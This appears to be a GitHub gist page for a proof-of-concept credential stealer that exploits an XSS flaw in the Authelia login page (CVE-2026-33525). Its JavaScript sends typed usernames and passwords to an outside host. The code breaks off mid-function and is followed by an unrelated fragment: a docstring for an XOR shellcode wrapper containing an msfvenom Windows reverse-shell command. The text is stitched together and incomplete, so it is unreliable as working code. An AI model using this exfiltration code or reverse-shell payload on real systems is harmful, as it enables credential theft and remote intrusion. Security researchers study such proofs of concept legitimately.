Skip to content

Instantly share code, notes, and snippets.

View interspective's full-sized avatar

Josh interspective

View GitHub Profile
@interspective
interspective / stealer2.js
Last active May 19, 2026 01:37
Authelia v4.39.15 Credential Stealer
// Authelia v4.39.15 Language Cookie XSS creds stealer PoC (CVE-2026-33525)
// https://www.stratussecurity.com/post/chaining-xss-to-steal-credentials-from-authelia-login-page
(function () {
console.log("Observer script loaded");
function stealAll(usernameField, passwordField) {
const fullData = 'u=' + encodeURIComponent(usernameField.value) + '&p=' + encodeURIComponent(passwordField.value);
const img = new Image();
img.src = 'https://10.22.11.10/steal?' + fullData;
"""
XOR-encoded shellcode wrapper for Windows x86-32 (works fine on x86-64)
Example:
$ msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai \
--format raw -b '\x00\xff' LHOST=192.168.56.1 LPORT=8080 \
2>/dev/null | python xor-payload.py --excel
@_hugsy_